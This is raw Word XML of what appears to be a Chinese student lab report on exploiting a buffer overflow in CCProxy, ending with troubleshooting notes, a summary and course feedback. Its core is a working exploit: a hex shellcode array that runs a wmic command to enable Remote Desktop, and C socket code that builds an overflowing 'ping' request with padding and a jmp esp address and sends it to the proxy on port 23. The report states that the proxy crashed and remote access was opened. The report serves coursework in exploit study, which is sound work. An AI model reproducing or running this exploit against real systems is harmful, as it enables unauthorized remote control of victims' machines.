          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>实现一个具备远程连接控制功能的ShellCode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>要实现远程连接，可以使用vmic命令完成，也是通过system()函数进行运行DOC命令，需要使用的wmic命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left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t>wmic PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2.然后我们就只需要将命令转化为硬编码，写入到汇编代码中即可，转化为ASCII码值的结果共87个字符，所以需要从ebp-0x58开始填写。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>然后修改shellcode，修改为我们上述的shellcode，注意需要抬高栈顶，否则装不下shellcode，代码如下：</w:t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0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6921500" cy="5154295"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="15" name="图片 15" descr="MQ[6XX]P~7)M(3YQWX91U$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MQ[6XX]P~7)M(3YQWX91U$C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21500" cy="51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 w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.反汇编获得汇编代码，得到十六进制的代码表示，从0x004013C到0x00401201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0" w:afterAutospacing="0"/>
        <w:ind w:left="-60" w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="30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0" w:afterAutospacing="0"/>
        <w:ind w:left="-60" w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5522595" cy="3166110"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:docPr id="20" name="图片 20" descr="VRN`WMAF{)`3_%XG@@`J}I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VRN`WMAF{)`3_%XG@@`J}I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2259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0" w:afterAutospacing="0"/>
        <w:ind w:left="-60" w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4.修改攻击代码，如下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#include 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"stdafx.h"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#include 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&lt;winsock2.h&gt;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#pragma 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comment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lib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"ws2_32"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#define WIN32_LEAN_AND_MEAN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#define MAX_LEN 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2000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shell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[]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={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0x55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0x8B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0xEC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0x33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0xFF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0x57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0x83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0xEC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0x60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0xA8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0x77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0xA9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0x6D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0xAA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0x69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0xAB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0x63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0xAC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0x20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0xAD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0x50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0xAE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0x41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0xAF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0x54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0xB0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0x48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0xB1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0x20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0xB2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0x77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0xB3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0x69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0xB4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0x6E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0xB5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0x33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0xB6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0x32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0xB7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0x5F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0xB8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0x74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0xB9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0x65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0xBA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0x72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0xBB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0x6D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0xBC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0x69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0xBD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0x6E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0xBE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0x61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0xBF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0x6C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0x73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0xC1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0x65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0xC2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0x72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0xC3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0x76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0xC4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0x69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0x63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0x65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0xC7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0x73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0xC8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0x65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0xC9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0x74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0xCA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0x74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0xCB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0x69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0xCC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0x6E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0xCD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0x67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0x20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0x57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0xD0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0x48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0xD1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0xD2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0x52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0xD3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0xD4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0x20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0xD5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0x28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0xD6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0x5F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0xD7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0x5F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0xD8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0x43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0xD9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0x6C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0xDA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0x61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0xDB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0x73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0xDC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0x73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0xDD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0x21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0xDE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0x3D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0xDF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0x22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0xE0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0x22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0xE1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0x29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0xE2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0x20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0xE3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0x43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0xE4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0x41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0xE5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0x4C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0xE6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0x4C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0xE7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0x20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0xE8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0x53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0xE9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0x65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0xEA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0x74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0xEB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0x41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0xEC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0x6C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0xED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0x6C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0xEE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0x6F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0xEF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0x77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0xF0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0x54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0xF1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0x53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0xF2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0x43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0xF3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0x6F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0xF4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0x6E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0xF5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0x6E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0xF6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0x65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0xF7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0x63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0xF8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0x74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0xF9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0x69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0xFA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0x6F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0xFB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0x6E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0xFC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0x73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0xFD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0x20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0xFE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0x31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0x8D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0xA8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0x50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0xB8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0xC7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0x93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0xBF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0x77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0xFF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0xD0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main(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argc,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* argv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[]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WSADATA ws; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b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 初始化 ws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ret = WSAStartup(MAKEWORD(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), &amp;ws);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sockaddr_in sa;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sa.sin_family = AF_INET;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sa.sin_port = htons(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23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sa.sin_addr.s_addr = inet_addr(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"127.0.0.1"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buf[MAX_LEN];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buf1[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buf[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]=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'p'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;buf[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]=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'i'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;buf[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]=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'n'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;buf[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]=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'g'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;buf[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]=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 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 插入Shellcode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l = strlen(shell);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//前4个字节为无用字节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buf[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]=buf[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]=buf[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]=buf[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]=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'a'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//开始填入shellcode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i,j;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(i=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,j=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;i&lt;l+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;i++,j++){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    buf[i]=shell[j];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//到溢出点为止都填入无用字节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(i=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+l;i&lt;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1012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;i++)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    buf[i]=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'a'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//在溢出点处填入 jump esp 指令的地址                       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buf[i++]=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'2'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;buf[i++]=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'1'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;buf[i++]=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'{'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;buf[i++]=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'w'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//继续填充无用字节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(i=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1021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;i&lt;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1998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;i++)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buf[i]=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'a'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//命令结束加上\r\n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buf[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1998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]=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'\r'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;buf[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1999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]=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'\n'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 创建 socket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SOCKET sc = WSASocket(AF_INET, SOCK_STREAM,IPPROTO_TCP,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//连接到服务器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ret = connect(sc, (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sockaddr*)&amp;sa,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(sa));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//接收服务器端的回答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recv(sc,buf1,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 发送攻击数据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ret = send(sc, buf, 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2000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    closesocket(sc);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WSACleanup();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0" w:afterAutospacing="0"/>
        <w:ind w:left="-60" w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.在OD中运行CCPROXY，再执行刚刚编写的代码，发现CCPROXY成功溢出崩溃，并且开启了远程服务。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0" w:afterAutospacing="0"/>
        <w:ind w:left="-60" w:leftChars="0" w:right="0" w:rightChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6283960" cy="2237740"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="22" name="图片 22" descr="XB[~PY58{I)XTOA~5X6_NJ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XB[~PY58{I)XTOA~5X6_NJC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8396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Cs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5757545" cy="3959860"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="21" name="图片 21" descr="0CX{OE]W)SL}%QLIP9VHYW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0CX{OE]W)SL}%QLIP9VHYWI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spacing w:before="328" w:after="328"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc164150376"/>
      <w:bookmarkStart w:id="18" w:name="_Toc54025141"/>
      <w:r>
        <w:rPr>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.实验遇到的难点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>与问题分析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问题1：VC6编译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1.报错fatal error C1010: unexpected end of file while looking for precompiled header directive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解决方法：添加头文件#include "stdafx.h"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2.报错：Unhandled exception in aaa.exe（NTDLL.DLL）:0xC0000005:Access Violation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没有指针问题，但是每次都会出现这个问题，重新debug就可以解决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问题2：JMP ESP指令的字符串转换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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将jmp esp地址0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>777b3132</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>转换位字符串，起初没有考虑小端存储方式，写成了w{12，正确位21{w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问题3：CCPROXY在windows xp下不能正确运行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报错显示不能代理，打开了telnet，使用管理员权限，关闭防火墙等均不能解决，未找到解决方法，最终只得换到win7进行实验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bookmarkEnd w:id="17"/>
    <w:bookmarkEnd w:id="18"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="328" w:after="328"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc54025142"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3.实验小结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="454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在实验一中通过查阅资料了解到PE文件相关的知识，包括其结构、格式、组织形式等，同时在破解序列号过程中熟悉了OD反汇编和调试过程，在已有汇编知识的基础上进行了序列号破解。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/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="454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验二中，初步接触了socket编程，实现了tcp/ip协议通信，学会了在汇编中添加shellcode代码，并实现了远程控制shellcode的编写，同时通过查阅资料发现CCPROXY的溢出是因为sprintf函数对溢出没有检验，直接对eip内容进行了覆盖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/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="454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通过两次实验学习到了Win32进程的相关原理和PE文件的相关知识，同时学会使用OD进行反汇编分析，了解缓冲区溢出的原理和利用该漏洞的技巧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/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:ind w:firstLine="454" w:firstLineChars="200"/>
        <w:textAlignment w:val="auto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0"/>
        </w:numPr>
        <w:spacing w:before="328" w:after="328"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc54025143"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>课程意见与建议</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="454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建议在理论课授课期间就让学生逐渐接触相关的工具和相关实验（或者是课后作业做比较相关的），而不是实验课前直接丢给我们一堆工具，一个比较简略的任务书，这样在实验课上真的很手足无措，甚至在老师都讲完了还不知道工具究竟怎么用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1985" w:right="1418" w:bottom="1701" w:left="1418" w:header="851" w:footer="992" w:gutter="0"/>
      <w:pgNumType w:start="1" w:chapSep="period"/>
      <w:cols w:space="425" w:num="1"/>
      <w:docGrid w:type="linesAndChars" w:linePitch="328" w:charSpace="-271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hint="eastAsia"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>I</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="10"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/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A7AF97F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CA7AF97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DFB6AE6C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DFB6AE6C"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="4"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="26EF69E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26EF69E9"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs>
        <w:ind w:left="900" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1320"/>
        </w:tabs>
        <w:ind w:left="1320" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1740"/>
        </w:tabs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60"/>
        </w:tabs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80"/>
        </w:tabs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000"/>
        </w:tabs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420"/>
        </w:tabs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840"/>
        </w:tabs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60"/>
        </w:tabs>
        <w:ind w:left="4260" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="31F65D92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31F65D92"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0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680"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="680"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="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1984"/>
        </w:tabs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4">
    <w:nsid w:val="36BB892F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="36BB892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3CFE2340"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CFE2340"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
        </w:tabs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320"/>
        </w:tabs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740"/>
        </w:tabs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60"/>
        </w:tabs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80"/>
        </w:tabs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000"/>
        </w:tabs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420"/>
        </w:tabs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840"/>
        </w:tabs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60"/>
        </w:tabs>
        <w:ind w:left="4260" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6">
    <w:nsid w:val="48FCDCA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48FCDCA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2"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="4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90681D"/>
    <w:rsid w:val="02C90EA8"/>
    <w:rsid w:val="0A7025AF"/>
    <w:rsid w:val="0D1F2541"/>
    <w:rsid w:val="0D502EA2"/>
    <w:rsid w:val="0FA63596"/>
    <w:rsid w:val="0FA6541C"/>
    <w:rsid w:val="0FEA7DF8"/>
    <w:rsid w:val="118B5BDD"/>
    <w:rsid w:val="13117118"/>
    <w:rsid w:val="16F41754"/>
    <w:rsid w:val="17796467"/>
    <w:rsid w:val="18EA1F52"/>
    <w:rsid w:val="1B90681D"/>
    <w:rsid w:val="1C9D768F"/>
    <w:rsid w:val="20AC054C"/>
    <w:rsid w:val="21D61E66"/>
    <w:rsid w:val="239B7635"/>
    <w:rsid w:val="23EA51A0"/>
    <w:rsid w:val="246A5FC4"/>
    <w:rsid w:val="2686274A"/>
    <w:rsid w:val="28A16442"/>
    <w:rsid w:val="28FD30E6"/>
    <w:rsid w:val="296D13C0"/>
    <w:rsid w:val="2A4033C5"/>
    <w:rsid w:val="2D301209"/>
    <w:rsid w:val="2EAE3822"/>
    <w:rsid w:val="30B65170"/>
    <w:rsid w:val="30CB108E"/>
    <w:rsid w:val="32A13F30"/>
    <w:rsid w:val="32BB2582"/>
    <w:rsid w:val="33825426"/>
    <w:rsid w:val="34653BBB"/>
    <w:rsid w:val="35496BCA"/>
    <w:rsid w:val="37B333CF"/>
    <w:rsid w:val="38524CB4"/>
    <w:rsid w:val="3C936FC4"/>
    <w:rsid w:val="3D4719CD"/>
    <w:rsid w:val="3DA079F1"/>
    <w:rsid w:val="41364BCD"/>
    <w:rsid w:val="43A2381F"/>
    <w:rsid w:val="440F5B05"/>
    <w:rsid w:val="44137AAF"/>
    <w:rsid w:val="46183715"/>
    <w:rsid w:val="476D7E52"/>
    <w:rsid w:val="48523B5F"/>
    <w:rsid w:val="4C2E468C"/>
    <w:rsid w:val="4D48695F"/>
    <w:rsid w:val="4E3160E5"/>
    <w:rsid w:val="4F4F1A78"/>
    <w:rsid w:val="52D82C69"/>
    <w:rsid w:val="53380B75"/>
    <w:rsid w:val="53C17C10"/>
    <w:rsid w:val="54287504"/>
    <w:rsid w:val="54D710D8"/>
    <w:rsid w:val="54FD6614"/>
    <w:rsid w:val="5A2B670B"/>
    <w:rsid w:val="5A5E7E61"/>
    <w:rsid w:val="5D4F6237"/>
    <w:rsid w:val="6184320B"/>
    <w:rsid w:val="61892FA0"/>
    <w:rsid w:val="66C802F3"/>
    <w:rsid w:val="68960EE3"/>
    <w:rsid w:val="6DB124E9"/>
    <w:rsid w:val="6FDD02BA"/>
    <w:rsid w:val="701A2019"/>
    <w:rsid w:val="704B2DEB"/>
    <w:rsid w:val="761044A7"/>
    <w:rsid w:val="7A9201C6"/>
    <w:rsid w:val="7DD06E99"/>
    <w:rsid w:val="7F1D7A03"/>
    <w:rsid w:val="7F7C0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39" w:semiHidden="0" w:name="toc 1"/>
    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0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qFormat="1"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topLinePunct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/>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="100" w:beforeLines="100" w:after="100" w:afterLines="100"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="30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numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="100" w:beforeLines="100" w:after="50" w:afterLines="50"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="32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Bullet"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="341"/>
        <w:tab w:val="right" w:leader="middleDot" w:pos="9080"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="454"/>
        <w:tab w:val="right" w:leader="middleDot" w:pos="9080"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="page number"/>
    <w:basedOn w:val="9"/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="Hyperlink"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
